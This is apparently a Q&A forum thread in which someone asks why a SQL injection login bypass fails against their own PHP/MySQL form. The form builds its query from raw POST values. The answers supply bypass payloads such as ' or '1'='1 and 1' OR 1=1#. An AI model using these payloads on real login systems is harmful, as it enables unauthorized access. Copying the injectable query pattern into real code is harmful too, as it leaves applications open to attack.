20

I want to use PHP/Mysql injection with a login example, my code is below.

I have tried with a username of anything' -- and an empty password but it doesn't work and I couldn't log in.

Could anyone help me?

<?php
mysql_connect('localhost','root','root');
mysql_select_db('hp');
?>

<form action="" method="post">
<table width="50%">
    <tr>
        <td>User</td>
        <td><input type="text" name="user"></td>
    </tr>
    <tr>
        <td></td>
        <td><input type="text" name="password"></td>
    </tr>
</table>
    <input type="submit" value="OK" name="s">
</form>

<?php
if($_POST['s']){
    $user = $_POST['user'];
    $pass = $_POST['password'];     
    $re = mysql_query("select * from zend_adminlist where user_name = '$user' and password = '$pass'");

    if(mysql_num_rows($re) == 0){       
        echo '0';
    }else{
        echo '1';
    }
}
?>
Improve this question
0

2 Answers 2

Reset to default
24

One of the most common examples is this query:

' or '1'='1

If you enter this as the username and password into some unsanitized login input the query changes like so:

Original: SELECT * FROM USERS WHERE USER='' AND PASS='';
Modified: SELECT * FROM USERS WHERE USER='' or '1'='1' AND PASS='' or '1'='1';

This causes each thing its looking for to be true, as 1 will always equal 1. Problem with this method is it does not allow the selection of a particular user. Doing so you need to make it ignore the AND statement by commenting it out as seen in other examples.

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

I mostly try # after the query like 1' OR 1=1# So the code after that commented out. someone also can use --
8

If the value of username is:

 $_POST['user'] = "1' OR 1 LIMIT 1; --";

Then the mysql query becomes:

select * 
from zend_adminlist 
where user_name = '1' OR 1 LIMIT 1; --' and password = '$pass'
Improve this answer

3 Comments

Doesn't mysql only allow 1 line per query?
1 line , it is true but one line means one query delimiter: ; The -- means that the code after it is commented out. So actually the upper query is one query. I just breaked lines to be the code readeable.
I use # instead of -- most of the time.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.